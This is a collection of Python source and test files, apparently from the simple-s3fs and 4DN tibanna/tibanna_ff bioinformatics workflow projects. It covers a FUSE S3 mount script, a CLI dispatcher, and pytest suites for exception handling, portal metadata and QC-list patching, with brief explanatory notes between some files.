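def blocks_for_range(offset, size, block_size=BLOCK_SIZE):
    """Yield (block_num, data_start, data_end) tuples covering [offset, offset + size)."""
    last_fetched = -1
    curr_start = offset
    while last_fetched < offset + size:
        block_num = curr_start // block_size
        block_start = block_num * block_size
        data_start = curr_start - block_start                      # slice start within the block
        data_end = min(block_size, offset + size - block_start)    # slice end within the block
        yield block_num, data_start, data_end
        last_fetched = curr_start + (data_end - data_start)
        curr_start += data_end - data_start

# A 3 MiB read starting 100 bytes into the file touches blocks 0 through 3:
# block 0 contributes bytes 100..2**20, blocks 1-2 are read whole, block 3 contributes 100 bytes.
print(list(blocks_for_range(100, 3 * 2 ** 20)))
```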
#### File: simple-s3fs/simple_s3fs/__main__.py
```python
import os
import argparse
import logging
import sys
from fuse import FUSE
from .httpfs import HttpFs
from pathlib import Path
def main():
parser = argparse.ArgumentParser(
description="""usage: simple-s3fs <mountpoint>""")
parser.add_argument('mountpoint')
parser.add_argument(
'-f', '--foreground',
action='store_true',
default=False,
help='Run in the foreground')
parser.add_argument(
'--block-size',
default=2**20, type=int
)
parser.add_argument(
'--disk-cache-size',
default=2**30,
type=int)
parser.add_argument(
'--disk-cache-dir',
default='/tmp/xx')
parser.add_argument(
'--lru-capacity',
default=400,
type=int)
parser.add_argument(
'--aws-profile',
default=None,
type=str)
parser.add_argument(
'-l', '--log',
default=None,
type=str)
args = vars(parser.parse_args())
if not os.path.isdir(args['mountpoint']):
try:
Path(args['mountpoint']).mkdir(mode=0o644, parents=True, exist_ok=True)
except OSError as e:
print("Mount point must be a directory: {}".format(args['mountpoint']),
file=sys.stderr)
print(e.strerror, file=sys.stderr)
cmd = 'umount -l '+args['mountpoint']
os.system(cmd)
sys.exit(1)
logger = logging.getLogger('simple-s3fs')
logger.setLevel(logging.INFO)
if args['log']:
hdlr = logging.FileHandler(args['log'])
formatter = logging.Formatter('%(asctime)s %(levelname)s %(module)s: %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
bucket = args['mountpoint'].split('/')[-1]
start_msg = """
Mounting HTTP Filesystem...
bucket: {bucket}
mountpoint: {mountpoint}
foreground: {foreground}
""".format(bucket=bucket,
mountpoint=args['mountpoint'],
foreground=args['foreground'])
print(start_msg, file=sys.stderr)
fuse = FUSE(
HttpFs(
bucket,
disk_cache_size=args['disk_cache_size'],
disk_cache_dir=args['disk_cache_dir'],
lru_capacity=args['lru_capacity'],
block_size=args['block_size'],
aws_profile=args['aws_profile'],
logger = logger
),
args['mountpoint'],
foreground=args['foreground'],
attr_timeout=0.0,
entry_timeout=0.0
)
if __name__ == "__main__":
main()
``` |
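A condensed sketch of what the entry point above ends up doing: the S3 bucket name is taken from the last path component of the mount point, and the `HttpFs` operations object is handed to FUSE. Paths and the AWS profile below are placeholders, and actually running this would try to mount the bucket (it needs FUSE and valid AWS credentials).
```python
# Minimal sketch of the mount flow in __main__.py; "/mnt/s3/my-bucket" and
# "my-aws-profile" are placeholder values, not part of the original source.
from fuse import FUSE
from simple_s3fs.httpfs import HttpFs

mountpoint = "/mnt/s3/my-bucket"
bucket = mountpoint.split('/')[-1]        # bucket name = last path component ("my-bucket")

FUSE(
    HttpFs(bucket, aws_profile="my-aws-profile"),
    mountpoint,
    foreground=True,
    attr_timeout=0.0,
    entry_timeout=0.0,
)
```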
{
"source": "4dn-dcic/tibanna",
"score": 2
} |
#### File: tibanna/awsf3/__main__.py
```python
import argparse
import inspect
from tibanna._version import __version__ # for now use the same version as tibanna
from . import utils
PACKAGE_NAME = 'awsf3'
class Subcommands(object):
def __init__(self):
pass
@property
def descriptions(self):
return {
'decode_run_json': 'decode run json',
'download_workflow': 'download workflow files',
'update_postrun_json_init': 'update postrun json with instance ID and file system',
'upload_postrun_json': 'upload postrun json file',
'update_postrun_json_upload_output': 'update postrun json with output paths/target/md5 and upload output',
'update_postrun_json_final': 'update postrun json with status, time stamp etc'
}
@property
def args(self):
return {
'decode_run_json':
[{'flag': ["-i", "--input-run-json"], 'help': "input run json file"}],
'download_workflow':
[],
'update_postrun_json_init':
[{'flag': ["-i", "--input-json"], 'help': "input run/postrun json file"},
{'flag': ["-o", "--output-json"], 'help': "output postrun json file"}],
'update_postrun_json_upload_output':
[{'flag': ["-i", "--input-json"], 'help': "input run/postrun json file"},
{'flag': ["-e", "--execution-metadata-file"],
'help': "execution metadata file (output json of cwltool / cromwell)"},
{'flag': ["-m", "--md5file"], 'help': "text file storing md5 values for output files"},
{'flag': ["-o", "--output-json"], 'help': "output postrun json file"},
{'flag': ["-L", "--language"], 'help': "language", 'default': "cwl_v1"},
{'flag': ["-u", "--endpoint-url"], 'help': "s3 vpc endpoint url"}],
'upload_postrun_json':
[{'flag': ["-i", "--input-json"], 'help': "input postrun json file to upload to s3"}],
'update_postrun_json_final':
[{'flag': ["-i", "--input-json"], 'help': "input run/postrun json file"},
{'flag': ["-o", "--output-json"], 'help': "output postrun json file"},
{'flag': ["-l", "--logfile"], 'help': "Tibanna awsem log file"}],
}
def decode_run_json(input_run_json):
utils.decode_run_json(input_run_json)
def download_workflow():
utils.download_workflow()
def update_postrun_json_init(input_json, output_json):
utils.update_postrun_json_init(input_json, output_json)
def update_postrun_json_upload_output(input_json, execution_metadata_file, md5file, output_json, language, endpoint_url):
utils.update_postrun_json_upload_output(input_json, execution_metadata_file, md5file, output_json, language, endpoint_url=endpoint_url)
def upload_postrun_json(input_json):
utils.upload_postrun_json(input_json)
def update_postrun_json_final(input_json, output_json, logfile):
utils.update_postrun_json_final(input_json, output_json, logfile)
def main(Subcommands=Subcommands):
"""
Execute the program from the command line
"""
scs = Subcommands()
# the primary parser is used for awsf -v or -h
primary_parser = argparse.ArgumentParser(prog=PACKAGE_NAME, add_help=False)
primary_parser.add_argument('-v', '--version', action='version',
version='%(prog)s ' + __version__)
# the secondary parser is used for the specific run mode
secondary_parser = argparse.ArgumentParser(prog=PACKAGE_NAME, parents=[primary_parser])
subparsers = secondary_parser.add_subparsers(
title=PACKAGE_NAME + ' subcommands',
description='choose one of the following subcommands to run ' + PACKAGE_NAME,
dest='subcommand',
metavar='subcommand: {%s}' % ', '.join(scs.descriptions.keys())
)
subparsers.required = True
def add_arg(name, flag, **kwargs):
subparser[name].add_argument(flag[0], flag[1], **kwargs)
def add_args(name, argdictlist):
for argdict in argdictlist:
add_arg(name, **argdict)
subparser = dict()
for sc, desc in scs.descriptions.items():
subparser[sc] = subparsers.add_parser(sc, help=desc, description=desc)
if sc in scs.args:
add_args(sc, scs.args[sc])
# two step argument parsing
# first check for top level -v or -h (i.e. `awsf3 -v`)
(primary_namespace, remaining) = primary_parser.parse_known_args()
# get subcommand-specific args
args = secondary_parser.parse_args(args=remaining, namespace=primary_namespace)
subcommandf = eval(args.subcommand)
sc_args = [getattr(args, sc_arg) for sc_arg in inspect.getargspec(subcommandf).args]
# run subcommand
subcommandf(*sc_args)
if __name__ == '__main__':
main()
``` |
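The two-step parsing in `main()` above first handles the top-level `-v`/`-h`, then dispatches the chosen subcommand to the module-level function of the same name, mapping parsed arguments onto its parameters via `inspect`. A hedged sketch of that flow (the json filename is a placeholder, and `utils.decode_run_json` is mocked so nothing real happens):
```python
# Illustration of the awsf3 CLI dispatch; "my_run.json" is a placeholder filename.
import sys
from unittest import mock
import awsf3.__main__ as awsf3_main

argv = ["awsf3", "decode_run_json", "-i", "my_run.json"]
with mock.patch.object(sys, "argv", argv), \
        mock.patch.object(awsf3_main.utils, "decode_run_json") as fake_decode:
    awsf3_main.main()

# main() resolves the subcommand string to the decode_run_json() wrapper above,
# which forwards the --input-run-json value on to utils.decode_run_json.
fake_decode.assert_called_once_with("my_run.json")
```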
{
"source": "4dn-dcic/tibanna_ff",
"score": 2
} |
#### File: tests/post_deployment/test_pony_errors.py
```python
import pytest
import boto3
import os
import time
from tibanna_4dn.core import API
from tibanna_4dn.vars import DEV_SFN
from tests.tibanna.pony.conftest import post_new_fastqfile, get_test_json, dev_key
JSON_DIR = 'test_json/pony/'
FILE_DIR = 'tests/files/'
def test_bwa():
key = dev_key()
# prep new File
data = get_test_json('bwa-mem.json')
fq1_uuid = post_new_fastqfile(key=key, upload_file=os.path.join(FILE_DIR, 'fastq/B.R1.fastq.gz'))
fq2_uuid = post_new_fastqfile(key=key, upload_file=os.path.join(FILE_DIR, 'fastq/B.R2.fastq.gz'))
# prep input json
data['input_files'][1]['uuid'] = fq1_uuid # fastq1
data['input_files'][2]['uuid'] = fq2_uuid # fastq2
api = API()
res = api.run_workflow(data, sfn=DEV_SFN)
assert 'jobid' in res
assert 'exec_arn' in res['_tibanna']
time.sleep(60)
# Terminate the EC2 instance to simulate an unintended termination
ec2 = boto3.client('ec2')
ec2_res = ec2.describe_instances(Filters=[{'Name': 'tag:Name', 'Values': ['awsem-' + res['jobid']]}])
instance_id = ec2_res['Reservations'][0]['Instances'][0]['InstanceId']
ec2.terminate_instances(InstanceIds=[instance_id])
time.sleep(360)
assert api.check_status(res['_tibanna']['exec_arn']) == 'FAILED'
```
#### File: tibanna/ffcommon/conftest.py
```python
import pytest
from dcicutils.s3_utils import s3Utils
import os
import json
def pytest_runtest_setup(item):
# called for running each test in directory
print("Running lambda tests for: ", item)
valid_env = pytest.mark.skipif(not os.environ.get("S3_ENCRYPT_KEY", False),
reason='Required environment not setup to run test')
def read_event_file(event_file_name, ff_keys=None):
with open(event_file_name) as json_data:
data = json.load(json_data)
if ff_keys is not None:
data['ff_keys'] = ff_keys
return data
def minimal_postrunjson_template():
return {'Job': {'App': {},
'Input': {'Input_files_data': {},
'Input_parameters': {},
'Secondary_files_data':{}},
'Output': {},
'JOBID': '',
'start_time': ''},
'config': {'log_bucket': ''}}
```
#### File: tibanna/ffcommon/test_exceptions.py
```python
from tibanna_ffcommon.exceptions import (
exception_coordinator,
)
from tibanna.exceptions import (
StillRunningException,
AWSEMJobErrorException,
)
import pytest
import mock
@exception_coordinator("wrapped_fun", mock.Mock(side_effect=StillRunningException("metadata")))
def wrapped_fun(event, context):
raise StillRunningException("I should not be called")
# this will raise an error
@exception_coordinator("update_ffmeta", mock.Mock())
def update_ffmeta_error_fun(event, context):
raise Exception("I should raise an error")
@exception_coordinator('error_fun', mock.Mock())
def error_fun(event, context):
raise Exception("lambda made a mess")
@exception_coordinator('awsem_error_fun', mock.Mock())
def awsem_error_fun(event, context):
raise AWSEMJobErrorException('awsem made a mess')
def test_exception_coordinator_errors_are_dumped_into_return_dict():
res = error_fun({'some': 'data', 'push_error_to_end': True}, None)
assert res['some'] == 'data'
assert res['error']
assert 'Error on step: error_fun' in res['error']
def test_exception_coordinator_throws_if_error_set_in_input_json():
# only throw the error because lambda name is update_ffmeta
with pytest.raises(Exception):
event = {'error': 'same like skip', 'push_error_to_end': True}
update_ffmeta_error_fun(event, None)
def test_exception_coordinator_error_thrown_if_ignored_exceptions():
# throw an error because this is an ignored exception and
# no 'error' in event json
with pytest.raises(Exception):
wrapped_fun({}, None)
def test_exception_coordinator_error_propogates():
# skip throwing an error because 'error' is in event json and the
# lambda name != update_ffmeta. error is propagated to the res
# and will be returned exactly as input
res = wrapped_fun({'error': 'should not raise', 'push_error_to_end': True}, None)
assert res['error'] == 'should not raise'
def test_exception_coordinator_skips_when_appropriate():
wrapped_fun({'skip': 'wrapped_fun'}, None)
def test_exception_coordinator_skips_in_list():
wrapped_fun({'skip': ['wrapped_fun', 'fun2']}, None)
def test_exception_coordinator_normally_doesnt_skip():
with pytest.raises(StillRunningException) as exec_nfo:
wrapped_fun({'skip': 'somebody_else'}, None)
assert exec_nfo
assert 'should not be called' in str(exec_nfo.value)
def test_exception_coordinator_calls_metadata_only_func():
with pytest.raises(StillRunningException) as exec_nfo:
wrapped_fun({'skip': 'somebody_else', 'metadata_only': 'wrapped_fun'}, None)
assert exec_nfo
assert 'metadata' in str(exec_nfo.value)
def test_exception_coordinator_add_awsem_error_to_output():
data = {"push_error_to_end": True}
res = awsem_error_fun(data, None)
assert ('error' in res)
def test_exception_coordinator_raises_awsem_error_when_not_pushed_to_end():
data = {"push_error_to_end": False}
with pytest.raises(AWSEMJobErrorException) as expinfo:
awsem_error_fun(data, None)
assert 'awsem made a mess' in str(expinfo.value)
```
#### File: tibanna/ffcommon/test_portal_utils.py
```python
import copy
from tibanna_ffcommon.portal_utils import (
TibannaSettings,
ensure_list,
FFInputAbstract,
WorkflowRunMetadataAbstract,
FourfrontStarterAbstract,
FourfrontUpdaterAbstract,
ProcessedFileMetadataAbstract,
)
from tibanna_ffcommon.qc import (
QCArgumentsByTarget
)
from tibanna_ffcommon.exceptions import (
MalFormattedFFInputException
)
import pytest
import mock
import logging
def test_tibanna():
data = {'env': 'fourfront-webdev',
'settings': {'1': '1'}}
tibanna = TibannaSettings(**data)
assert tibanna
assert tibanna.as_dict() == data
def test_ensure_list():
assert ensure_list(5) == [5]
assert ensure_list('hello') == ['hello']
assert ensure_list(['hello']) == ['hello']
assert ensure_list({'a': 'b'}) == [{'a': 'b'}]
def test_ff_input_abstract():
data = {'workflow_uuid': 'a',
'config': {'log_bucket': 'b'},
'output_bucket': 'c'}
inp = FFInputAbstract(**data)
assert inp.workflow_uuid == 'a'
assert inp.config.log_bucket == 'b'
assert 'ecr' in inp.config.awsf_image
def test_ff_input_abstract_missing_field_error2():
data = {'workflow_uuid': 'a',
'output_bucket': 'c'}
with pytest.raises(MalFormattedFFInputException) as excinfo:
FFInputAbstract(**data)
assert "missing field in input json: config" in str(excinfo.value)
def test_ff_input_abstract_missing_field_error3():
data = {'config': {'log_bucket': 'b'},
'output_bucket': 'c'}
with pytest.raises(MalFormattedFFInputException) as excinfo:
FFInputAbstract(**data)
assert "missing field in input json: workflow_uuid" in str(excinfo.value)
def test_workflow_run_metadata_abstract():
data = {'workflow': 'a', 'awsem_app_name': 'b', 'app_version': 'c'}
ff = WorkflowRunMetadataAbstract(**data)
assert ff.workflow == 'a'
assert ff.awsem_app_name == 'b'
assert ff.title.startswith('b c run')
def test_workflow_run_metadata_abstract_missing_field_error1(caplog):
data = {'awsem_app_name': 'b', 'app_version': 'c'}
WorkflowRunMetadataAbstract(**data)
log = caplog.get_records('call')[0]
assert log.levelno == logging.WARNING
assert 'workflow is missing' in log.message
def test_processed_file_metadata_abstract():
data = {'uuid': 'a'}
pf = ProcessedFileMetadataAbstract(**data)
assert pf.uuid == 'a'
@pytest.fixture
def qcarginfo_bamsnap():
return {
"argument_type": "Output QC file",
"workflow_argument_name": "bamsnap_images",
"argument_to_be_attached_to": "input_vcf",
"qc_zipped": True,
"qc_unzip_from_ec2": True,
"qc_acl": "private"
}
def test_mock():
updater = FourfrontUpdaterAbstract(strict=False)
fake_wf = {'arguments': [{},{},{},qcarginfo_bamsnap]}
with mock.patch('tibanna_ffcommon.portal_utils.FourfrontUpdaterAbstract.get_metadata', return_value=fake_wf):
wf = updater.workflow
assert wf == fake_wf
def test_FourfrontUpdaterAbstract_workflow_qc_arguments(qcarginfo_bamsnap):
updater = FourfrontUpdaterAbstract(strict=False)
fake_wf = {'arguments': [qcarginfo_bamsnap]}
with mock.patch('tibanna_ffcommon.portal_utils.FourfrontUpdaterAbstract.get_metadata', return_value=fake_wf):
wf_qc_arguments = updater.workflow_arguments('Output QC file')
qcbt = QCArgumentsByTarget(wf_qc_arguments)
assert len(qcbt.qca_by_target) == 1
assert 'input_vcf' in qcbt.qca_by_target
assert len(qcbt.qca_by_target['input_vcf'].qca_list) == 1
qc1 = qcbt.qca_by_target['input_vcf'].qca_list[0]
assert qc1.qc_zipped
assert qc1.qc_unzip_from_ec2
assert qc1.qc_acl == 'private'
assert qc1.argument_to_be_attached_to == 'input_vcf'
assert qc1.workflow_argument_name == 'bamsnap_images'
assert qc1.qc_type is None
def test_parse_rna_strandedness():
report_content = '468\n0\n'
res = FourfrontUpdaterAbstract.parse_rna_strandedness_report(report_content)
assert len(res) == 2
assert res[0] == 468
assert res[1] == 0
def test_parse_fastq_first_line():
report_content = '@HWI-ST1318:469:HV2C3BCXY:1:1101:2874:1977 1:N:0:ATGTCA'
res = [FourfrontUpdaterAbstract.parse_fastq_first_line_report(report_content)]
assert len(res) == 1
assert res[0] == '@HWI-ST1318:469:HV2C3BCXY:1:1101:2874:1977 1:N:0:ATGTCA'
def test_parse_re_check():
report_content = 'clipped-mates with RE motif: 76.54 %'
res = FourfrontUpdaterAbstract.parse_re_check(report_content)
assert type(res) is float
assert res == 76.54
def test_parse_custom_fields():
custom_pf_fields = {'somearg': {'a': 'b', 'c': 'd'},
'arg2': {'x': 'y'},
'ALL': {'e': 'f'}}
common_fields = {'g': 'h', 'i': 'j'}
res = FourfrontStarterAbstract.parse_custom_fields(custom_pf_fields, common_fields, "somearg")
for fld in ['a', 'c', 'e', 'g', 'i']:
assert fld in res
assert 'x' not in res
def test_parse_custom_fields_overwrite():
"""testing custom_pf_fields overwriting common_fields"""
custom_pf_fields = {'somearg': {'a': 'b', 'c': 'd'},
'arg2': {'x': 'y'},
'ALL': {'e': 'f'}}
common_fields = {'a': 'h', 'e': 'j'}
res = FourfrontStarterAbstract.parse_custom_fields(custom_pf_fields, common_fields, "somearg")
for fld in ['a', 'c', 'e']:
assert fld in res
assert res['a'] == 'b' # common_fields overwritten by custom_pf_fields[argname]
assert res['e'] == 'f' # common_fields overwritten by custom_pf_fields[All]
def test_create_wfr_qc():
"""custom_qc_fields does not apply to wfr_qc, but common_fields do"""
updater = FourfrontUpdaterAbstract(**{'config': {'log_bucket': 'some_bucket'}}, strict=False)
updater.jobid = 'some_jobid'
updater.custom_qc_fields = {'a': 'b', 'c': 'd'}
updater.common_fields = {'a': 'h', 'e': 'j'}
updater.create_wfr_qc()
wfr_qc_uuid = list(updater.post_items['QualityMetricWorkflowrun'].keys())[0]
wfr_qc = updater.post_items['QualityMetricWorkflowrun'][wfr_qc_uuid]
assert 'e' in wfr_qc and wfr_qc['e'] == 'j' # common_fields
assert 'c' not in wfr_qc # custom_qc_fields does NOT get into wfr qc
assert 'a' in wfr_qc and wfr_qc['a'] == 'h' # common_fields NOT overwritten by custom_qc_fields
```
#### File: tibanna/ffcommon/test_wfr.py
```python
from tibanna_ffcommon.wfr import (
InputFilesForWFRMeta,
InputFileForWFRMeta,
create_ordinal,
aslist
)
import pytest
@pytest.fixture
def fake_wfrmeta_input_dict():
return {'workflow_argument_name': 'somearg',
'value': 'someuuid',
'ordinal': 1,
'dimension': '0',
'format_if_extra': 'bai'}
@pytest.fixture
def fake_wfrmeta_input_dict2():
return {'workflow_argument_name': 'somearg',
'value': 'someuuid2',
'ordinal': 2,
'dimension': '1',
'format_if_extra': 'bai'}
def test_create_ordinal():
assert create_ordinal('a') == 1
def test_create_ordinal_list():
assert create_ordinal(['a', 'b', 'c']) == [1, 2, 3]
def test_aslist():
assert aslist('a') == ['a']
assert aslist(['a']) == ['a']
assert aslist(['a', 'b']) == ['a', 'b']
def test_InputFileForWFRMeta(fake_wfrmeta_input_dict):
ipfw = InputFileForWFRMeta(**fake_wfrmeta_input_dict)
assert ipfw.workflow_argument_name == 'somearg'
assert ipfw.value == 'someuuid'
assert ipfw.ordinal == 1
assert ipfw.dimension == '0'
assert ipfw.format_if_extra == 'bai'
assert ipfw.as_dict() == fake_wfrmeta_input_dict
def test_InputFilesForWFRMeta(fake_wfrmeta_input_dict,
fake_wfrmeta_input_dict2):
ipfws = InputFilesForWFRMeta()
assert ipfws
assert ipfws.input_files == []
ipfws.append(InputFileForWFRMeta(**fake_wfrmeta_input_dict))
assert ipfws.input_files[0].as_dict() == fake_wfrmeta_input_dict
assert ipfws.as_dict() == [fake_wfrmeta_input_dict]
ipfws.append(InputFileForWFRMeta(**fake_wfrmeta_input_dict2))
assert ipfws.input_files[1].as_dict() == fake_wfrmeta_input_dict2
assert ipfws.as_dict() == [fake_wfrmeta_input_dict,
fake_wfrmeta_input_dict2]
def test_InputFilesForWFRMeta_add_input_file():
ipfws = InputFilesForWFRMeta()
# add a singleton
ipfws.add_input_files('u1', 'arg1')
expected = {'value': 'u1', 'workflow_argument_name': 'arg1',
'ordinal': 1, 'dimension': '0'}
assert ipfws.input_files[0].as_dict() == expected
# add a 1d list
ipfws.add_input_files(['u2', 'u3'], 'arg2')
expected2 = {'value': 'u2', 'workflow_argument_name': 'arg2',
'ordinal': 1, 'dimension': '0'}
expected3 = {'value': 'u3', 'workflow_argument_name': 'arg2',
'ordinal': 2, 'dimension': '1'}
assert ipfws.input_files[1].as_dict() == expected2
assert ipfws.input_files[2].as_dict() == expected3
# add a 2d list
ipfws.add_input_files([['u4', 'u5'],['u6','u7']], 'arg3', 'bai')
expected4 = {'value': 'u4', 'workflow_argument_name': 'arg3',
'ordinal': 1, 'dimension': '0-0', 'format_if_extra': 'bai'}
expected5 = {'value': 'u5', 'workflow_argument_name': 'arg3',
'ordinal': 2, 'dimension': '0-1', 'format_if_extra': 'bai'}
expected6 = {'value': 'u6', 'workflow_argument_name': 'arg3',
'ordinal': 3, 'dimension': '1-0', 'format_if_extra': 'bai'}
expected7 = {'value': 'u7', 'workflow_argument_name': 'arg3',
'ordinal': 4, 'dimension': '1-1', 'format_if_extra': 'bai'}
assert ipfws.input_files[3].as_dict() == expected4
assert ipfws.input_files[4].as_dict() == expected5
assert ipfws.input_files[5].as_dict() == expected6
assert ipfws.input_files[6].as_dict() == expected7
# testing arg names
assert set(ipfws.arg_names) == set(['arg1', 'arg2', 'arg3'])
# error trying to enter the same arg name again
with pytest.raises(Exception) as ex_info:
ipfws.add_input_files('u8', 'arg1')
assert 'Arg arg1 already exists in the list' in str(ex_info.value)
```
#### File: tibanna/pony/test_start_run.py
```python
from tibanna_4dn.start_run import start_run
def test_md5(start_run_md5_data):
res = start_run(start_run_md5_data)
def test_md5_comprehensive(start_run_md5_comprehensive_data):
res = start_run(start_run_md5_comprehensive_data)
```
#### File: tibanna/zebra/test_zebra_utils_post.py
```python
from tibanna_ffcommon.portal_utils import (
TibannaSettings,
FormatExtensionMap,
)
from tibanna_cgap.zebra_utils import (
FourfrontStarter,
FourfrontUpdater,
ProcessedFileMetadata,
)
import pytest
from dcicutils import ff_utils
from tests.tibanna.zebra.conftest import (
valid_env,
)
from tests.tibanna.ffcommon.conftest import (
minimal_postrunjson_template
)
from tests.tibanna.zebra.conftest import (
post_new_processedfile,
post_new_qc
)
@valid_env
def test_fourfront_starter(start_run_event_md5):
starter = FourfrontStarter(**start_run_event_md5)
assert starter
assert 'arguments' in starter.inp.wf_meta
assert len(starter.inp.wf_meta['arguments']) == 2
assert starter.inp.wf_meta['arguments'][1]['argument_type'] == 'Output report file'
starter.run()
assert len(starter.output_argnames) == 1
@valid_env
def test_qclist_handling():
data = {'ff_meta': {'workflow': 'cgap:workflow_bwa-mem_no_unzip-check_v10'},
'config': {'log_bucket': 'somelogbucket'},
'postrunjson': minimal_postrunjson_template(),
'_tibanna': {'env': 'fourfront-cgap', 'settings': {'1': '1'}}}
updater = FourfrontUpdater(**data)
new_qc_object = next(updater.qc_template_generator())
# file w/ no quality_metric object
new_pf_uuid = post_new_processedfile(file_format='bam', key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid in updater.patch_items
assert updater.patch_items[new_pf_uuid]['quality_metric'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ quality_metric object of same type
existing_qc_uuid = post_new_qc('QualityMetricBamcheck', key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qc_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid in updater.patch_items
assert updater.patch_items[new_pf_uuid]['quality_metric'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ quality_metric object of different type
existing_qc_uuid = post_new_qc('QualityMetricWgsBamqc', key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qc_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid in updater.patch_items
new_qc_uuid = updater.patch_items[new_pf_uuid]['quality_metric']
assert 'quality_metric_qclist' in updater.post_items
assert new_qc_uuid in updater.post_items['quality_metric_qclist']
res = updater.post_items['quality_metric_qclist'][new_qc_uuid]
assert 'qc_list' in res
assert len(res['qc_list']) == 2
assert res['qc_list'][0]['qc_type'] == 'quality_metric_wgs_bamqc'
assert res['qc_list'][1]['qc_type'] == 'quality_metric_bamcheck'
assert res['qc_list'][0]['value'] == existing_qc_uuid
assert res['qc_list'][1]['value'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ qc list with only quality_metric object of different type
existing_qc_uuid = post_new_qc('QualityMetricWgsBamqc', key=updater.tibanna_settings.ff_keys)
existing_qclist = [{'qc_type': 'quality_metric_wgs_bamqc',
'value': existing_qc_uuid}]
existing_qclist_uuid = post_new_qc('QualityMetricQclist', qc_list=existing_qclist,
key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qclist_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid not in updater.patch_items
assert existing_qclist_uuid in updater.patch_items
assert 'qc_list' in updater.patch_items[existing_qclist_uuid]
assert len(updater.patch_items[existing_qclist_uuid]['qc_list']) == 2
res = updater.patch_items[existing_qclist_uuid]
assert res['qc_list'][0]['qc_type'] == 'quality_metric_wgs_bamqc'
assert res['qc_list'][1]['qc_type'] == 'quality_metric_bamcheck'
assert existing_qc_uuid in res['qc_list'][0]['value']
assert new_qc_object['uuid'] in res['qc_list'][1]['value']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qclist_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ qc list with only quality_metric object of same type
existing_qc_uuid = post_new_qc('QualityMetricWgsBamqc', key=updater.tibanna_settings.ff_keys)
existing_qclist = [{'qc_type': 'quality_metric_bamcheck',
'value': existing_qc_uuid}]
existing_qclist_uuid = post_new_qc('QualityMetricQclist', qc_list=existing_qclist,
key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qclist_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid not in updater.patch_items
assert existing_qclist_uuid in updater.patch_items
assert 'qc_list' in updater.patch_items[existing_qclist_uuid]
assert len(updater.patch_items[existing_qclist_uuid]['qc_list']) == 1
res = updater.patch_items[existing_qclist_uuid]
assert res['qc_list'][0]['qc_type'] == 'quality_metric_bamcheck'
assert res['qc_list'][0]['value'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qclist_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
```
#### File: tibanna/zebra/test_zebra_utils.py
```python
from tibanna_cgap.vars import (
DEFAULT_PROJECT,
DEFAULT_INSTITUTION
)
from tibanna_ffcommon.portal_utils import (
TibannaSettings,
FormatExtensionMap,
)
from tibanna_cgap.zebra_utils import (
FourfrontStarter,
FourfrontUpdater,
ZebraInput
)
from tests.tibanna.zebra.conftest import valid_env, logger
import mock
@valid_env
def test_tibanna():
data = {'env': 'fourfront-cgap',
'settings': {'1': '1'}}
tibanna = TibannaSettings(**data)
assert tibanna
assert tibanna.as_dict() == data
@valid_env
def test_format_extension_map():
data = {'env': 'fourfront-cgap',
'settings': {'1': '1'}}
tibanna = TibannaSettings(**data)
fe_map = FormatExtensionMap(tibanna.ff_keys)
assert(fe_map)
assert 'bwt' in fe_map.fe_dict.keys()
def test_array_uuid():
"""test for object_key and bucket name auto-filled for an array uuid"""
# This test requires the following files to have metadata (not necessarily the physical file)
# eda72adf-3999-4ef4-adf7-58a64a9044d8, eda9be6d-0ecd-4bad-bd07-6e1a7efc98be
# with accessions GAPFIQNHLO6D and GAPFIZ25WPXE
# on cgapwolf
# the format and status of these file items should be rck_gz and uploaded as well.
input_file_list = [
{
"workflow_argument_name": "input_rcks",
"uuid": ["eda72adf-3999-4ef4-adf7-58a64a9044d8", "eda9be6d-0ecd-4bad-bd07-6e1a7efc98be"]
}
]
_tibanna = {'env': 'fourfront-cgapwolf',
'settings': {'1': '1'}}
inp = ZebraInput(workflow_uuid='a',
config={'log_bucket': 'b'},
output_bucket='c',
input_files=input_file_list,
_tibanna=_tibanna)
inputfiles = inp.input_files.as_dict()
assert 'bucket_name' in inputfiles[0]
assert 'object_key' in inputfiles[0]
assert inputfiles[0]['bucket_name'] == 'elasticbeanstalk-fourfront-cgapwolf-wfoutput'
assert len(inputfiles[0]['object_key']) == 2
assert inputfiles[0]['object_key'][0] == "<KEY>"
assert inputfiles[0]['object_key'][1] == "<KEY>"
@valid_env
def test_extra_file_rename():
"""Test for rename tag working for extra files"""
# This test requires the following files to have metadata (not necessarily the physical file)
